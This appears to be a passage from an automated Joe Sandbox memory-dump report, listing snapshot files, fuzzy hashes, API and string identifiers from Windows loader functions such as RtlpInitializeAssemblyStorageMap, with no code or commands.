                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local\$@
                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                • Opcode ID: 5e9e1b34d980c01fb6ba5ced96751f7653da78c7a981628c5f64203c38f31fd0
                                                                                                                                                                                • Instruction ID: 7b4038028fe4cde1f18a3d716291dc96af47a4f1f65d175bbcaded2aeea1c44e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e9e1b34d980c01fb6ba5ced96751f7653da78c7a981628c5f64203c38f31fd0
                                                                                                                                                                                • Instruction Fuzzy Hash: AB3170B5949301AFD311CF28C8C0A5BBBF8FB85668F44492EF99593264D634DD088B93
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 333A289F
                                                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 333A289A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                                                • Opcode ID: 0e867f76fd2726c37cbaaef045a9cbae07931d16ab033f2e3ca86125b13173f2
                                                                                                                                                                                • Instruction ID: 83e2987466b0c6ad1506d95df91d8ea5282f7a238e8d89070e7976053f08c76c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e867f76fd2726c37cbaaef045a9cbae07931d16ab033f2e3ca86125b13173f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F110676F05304BFE71A8E49CC81F5A76ADDB84754F24C029B904DB258DA74CD4086A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @[B3@[B3
                                                                                                                                                                                • API String ID: 0-1327373317
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                • API String ID: 0-232158463
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0hB3
                                                                                                                                                                                • API String ID: 0-3929338292
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 23
                                                                                                                                                                                • API String ID: 0-3336434291
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Flst
                                                                                                                                                                                • API String ID: 0-2374792617
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: 3Fw3Fw
                                                                                                                                                                                • API String ID: 3446177414-4091346658
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: BinaryName
                                                                                                                                                                                • API String ID: 0-215506332
                                                                                                                                                                                • Opcode ID: 6d04cb967d44e21468cc3457932a77cbc2d72dfed0c48bc36ece05c5eac3822a
                                                                                                                                                                                • Instruction ID: 88cbc96c5c359809f8262b0e1a76b3a01d1acab49740856890ca874dfe7eb0bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d04cb967d44e21468cc3457932a77cbc2d72dfed0c48bc36ece05c5eac3822a
                                                                                                                                                                                • Instruction Fuzzy Hash: CF31C0BAD40619AFEB16CF5CC845E6BB7B8EF80720F018129F910E7650DB329E04C7A0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1f735d1c2fda7257a283def8d5ff7cc4b646208b57e65adeb35a867929928c64
                                                                                                                                                                                • Instruction ID: ae575fe6a1a386c3b8f52bd502ea1de6645f666350e208c72399b226d3e662d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f735d1c2fda7257a283def8d5ff7cc4b646208b57e65adeb35a867929928c64
                                                                                                                                                                                • Instruction Fuzzy Hash: 82429175E006268FDB04CF59C8906AEB7B6FF88354B58C55DE851AF740DB34E846CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5bcc604f1e089a2066db0b838d5f81bd96644074749dc2ea479f4aca1fbc35c2
                                                                                                                                                                                • Instruction ID: 535666a6b7b37fa007064472d10d8fd008bd58cca5afc5eb18f9f05aa51a35e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bcc604f1e089a2066db0b838d5f81bd96644074749dc2ea479f4aca1fbc35c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8832FE74A81754CFFB14CFA9C890BAEBBF6AF84750F24C11DD485AB684DB35A842CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 159005c7ac2f0543dd8e6730f57adba090611ef250ca589baa60d09e85eafdc3
                                                                                                                                                                                • Instruction ID: efb384244af0ed9917a0dd90798e651d2a1e431e68dcf581b31933764296901b
                                                                                                                                                                                • Opcode Fuzzy Hash: 159005c7ac2f0543dd8e6730f57adba090611ef250ca589baa60d09e85eafdc3
                                                                                                                                                                                • Instruction Fuzzy Hash: 6722B275E002168FDB09CF99D890AAAB3F6BF88344F98C16DD855EB344DB35E941CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16349897ebc247d3e0f4cac9729eb242fc51a0abb2a260bf7781a9c27ff57aa3
                                                                                                                                                                                • Instruction ID: 822aace63d2fd8009163a7926a0304bb6ca3a426790eb507ef9600e00ff6f9d1
                                                                                                                                                                                • Opcode Fuzzy Hash: 16349897ebc247d3e0f4cac9729eb242fc51a0abb2a260bf7781a9c27ff57aa3
                                                                                                                                                                                • Instruction Fuzzy Hash: 31D1D075E0071A9FDB04CF68C881AAA7BB9EF44345F48C129F965DF680EB34D949CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f31fc268ff95c95e449b08418b3f7d3e3cf00c17f0e969096dfe37c692078de
                                                                                                                                                                                • Instruction ID: f800e6f13ca69b7baaa626d1a8d41a9d90caa2fd4ba923db92188f8f51f2f649
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f31fc268ff95c95e449b08418b3f7d3e3cf00c17f0e969096dfe37c692078de
                                                                                                                                                                                • Instruction Fuzzy Hash: BFC1AEB5E023069FEB14CF58C840BAEB7B6EF45720F18C269E855EB290D774E941CB81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6656ccc854ae8e2902825a61b4641cfa4bb0f0da71986e033e8e407e74bb41a
                                                                                                                                                                                • Instruction ID: 22c4721720aca5835d54ec8038d0b9f2b9f1e73285f2ffdbfa86defb680f1253
                                                                                                                                                                                • Opcode Fuzzy Hash: a6656ccc854ae8e2902825a61b4641cfa4bb0f0da71986e033e8e407e74bb41a
                                                                                                                                                                                • Instruction Fuzzy Hash: FAD1F4B59007099FDB41CF68C980B8A7BE9FF09340F1481BAED49EB256DB35D905CBA0
Memory Dump Source
• Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
• Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 55c6215166ebd9222e7456e473bc08468fb9f20340234d349d5529295043273c
                                                                                                                                                                                • Instruction ID: 1685498a89286183460074f6465f4c45c33e048374fb1bce382f3b421fb238da
                                                                                                                                                                                • Opcode Fuzzy Hash: 55c6215166ebd9222e7456e473bc08468fb9f20340234d349d5529295043273c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC1F375A052258BEB04CF18C890B79B7E5FF48B44F5DC2A9E841AF395DB74C941CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d19447eb0678e05e7762e1d8a7d2d21dfad09c25219f59dbb3e35cb17232ecf2
                                                                                                                                                                                • Instruction ID: 6d080d337d9da2d7684033d11ffd53049a139bdb1679a95428eda3cb324d3d0d
                                                                                                                                                                                • Opcode Fuzzy Hash: d19447eb0678e05e7762e1d8a7d2d21dfad09c25219f59dbb3e35cb17232ecf2
                                                                                                                                                                                • Instruction Fuzzy Hash: F3C124B1D027059FDB15CFA8D880A99BBF4FF49760F14C16AE416EB750EB34A9018F51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f29331b57045691dbe3683513166cfcbe8c9cd1620983009571d718d54d36fb3
                                                                                                                                                                                • Instruction ID: ff9d443c646dabeb4d64d38e3505186ae456ad22eccd9f29440d8a8955704a05
                                                                                                                                                                                • Opcode Fuzzy Hash: f29331b57045691dbe3683513166cfcbe8c9cd1620983009571d718d54d36fb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 54C14674609340CFE360CF14C894BAAB7E5FF88344F44896DE9999B690D7B4E948CF92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c006e46b3925ac29b6eac49726db8ec6247c688134e05c85b4b3084b1206c8f8
                                                                                                                                                                                • Instruction ID: c5459b39afa3b899d42a93af574ada1fc976b10c1157a5eb7f72e25d8b378c80
                                                                                                                                                                                • Opcode Fuzzy Hash: c006e46b3925ac29b6eac49726db8ec6247c688134e05c85b4b3084b1206c8f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 33B19D74E002658FEB24CF65C890BAAB7B5AF44740F14C5EAD44AEB650EB31DEC5CB20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4551fdcdf4ad8d7fb9217ba79003fcddb213634609b30c3176cbfcfb800be9b0
                                                                                                                                                                                • Instruction ID: 7ac547e8fa8bff0a6a4c3eb0aace8141cc377f361a925989979afa075a0aafc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 4551fdcdf4ad8d7fb9217ba79003fcddb213634609b30c3176cbfcfb800be9b0
                                                                                                                                                                                • Instruction Fuzzy Hash: A9A1CE79A00709DFEB14CF69C980BAAB7B9FF44344F548129E945E7281EB3CE845CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1c2239d4fbb9d83cad9b7f20ca31fe29c6e9556f4d407ec59ffb6e93c656325d
                                                                                                                                                                                • Instruction ID: 432cc98f257f8c4138d605cbfee39bae3d51de214ac195dc0b29f53eee1841b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c2239d4fbb9d83cad9b7f20ca31fe29c6e9556f4d407ec59ffb6e93c656325d
                                                                                                                                                                                • Instruction Fuzzy Hash: 6BA197B2A04701AFD311CF24D980B4AB7E9FF48754F848528E989EBB51C774E892CF95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e45d5f3e2acdd8d684ae3cbbc9cf51a02e04889c2851b4bb898fcf578d434eea
                                                                                                                                                                                • Instruction ID: 231fe93410976207189cc4d32123f75bb2240f25857b65388fb77287bc043781
                                                                                                                                                                                • Opcode Fuzzy Hash: e45d5f3e2acdd8d684ae3cbbc9cf51a02e04889c2851b4bb898fcf578d434eea
                                                                                                                                                                                • Instruction Fuzzy Hash: 03910475E02714CBE7118F69D880BAE77E5EF84750F49C0A9E844EB7A0EA389941CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
